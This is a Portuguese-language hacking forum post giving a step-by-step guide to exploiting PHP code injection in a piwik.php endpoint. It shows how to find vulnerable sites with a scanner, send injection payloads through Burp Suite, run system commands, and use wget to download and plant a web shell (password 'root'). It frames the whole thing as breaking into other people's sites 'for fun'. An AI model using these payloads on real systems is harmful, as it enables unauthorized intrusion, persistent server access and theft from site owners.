Ir para conteúdo
  • 2 Quem está por aqui   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.

PHP Code Injection


Dark Army
 Compartilhar

Posts Recomendados

O que é?

 

A injeção de código PHP é uma vulnerabilidade que permite que um invasor injete código personalizado no mecanismo de script do servidor, essa vulnerabilidade ocorre quando um invasor pode controlar toda ou parte de uma sequência de entrada que é alimentada em uma chamada de função eval(). Eval executará o argumento como código.

 

*Programas Necessários*
Acutenix 
Burpsuite

 

1. Procure um site com essa vulnerabilidade, utilizando o Acutenix, quando ele achar, ele vai mostrar, como demonstra abaixo:
cats00.thumb.jpg.d12ada7c31acad8a4c331050e80d2bfe.jpg

 

2. Veja o diretório da falha, no caso é: /analitics/piwik.php/analitics
O post data que é enviado: page=%24%7b%40print(md5(acunetix_wvs_security_test))%7d&referrer=

É necessário se cadastrar para acessar o conteúdo.

 

Agora vamos ao BurpSuite.


*Lembrando, faça a configuração do proxy no Firefox, etc..*
*Creio que você já sabe disso.*

 

Entre no site com o dir da falha pelo Firefox, exemplo:

É necessário se cadastrar para acessar o conteúdo.
e vai no BurpSuite, e clique em "Forward", entre em HTTP History, vá ao site, e clique com botão direito, e clique em Send Repeater.

 

3. Clique em SEND, agora em RAW, coloque o post data do acutenix.
page=%24%7b%40print(md5(acunetix_wvs_security_test))%7d&referrer=http://www.site.com.br/

 

E mude de GET para POST.

 

Se tudo tiver indo bem, vai ficar igual na imagem abaixo:
cats12.thumb.jpg.d8dd479a8f292d35a433d65226dc6f2c.jpg

 

Agora vamos começar a "invasão".

Clique em "Params" e modifique o page, vai está assim: %24%7b%40print(md5(acunetix_wvs_security_test))%7d
Coloque: ${system('pwd')}

 

Vai retornar: /home/var/www/site.com.br/public_html/analitics

 

Agora coloque: cd .. && wget

É necessário se cadastrar para acessar o conteúdo.
-O teste00.php

O comando vai ficar: ${system('cd .. && wget

É necessário se cadastrar para acessar o conteúdo.
-O teste00.php')}

*Pode mudar de shell, caso queira, a senha dessa shell é root*

 

Se a invasão for bem sucedida, vai no site e coloque o nome teste00.php no final.


Exemplo: www.site.com.br/teste00.php, caso for bem sucedido, vai entrar, fique a vontade para se divertir :)

 

*Extra:*

É necessário se cadastrar para acessar o conteúdo.

  • Curtir 9

 ♚ KING RETURN ♚

 

Link para o comentário
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
 Compartilhar

×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.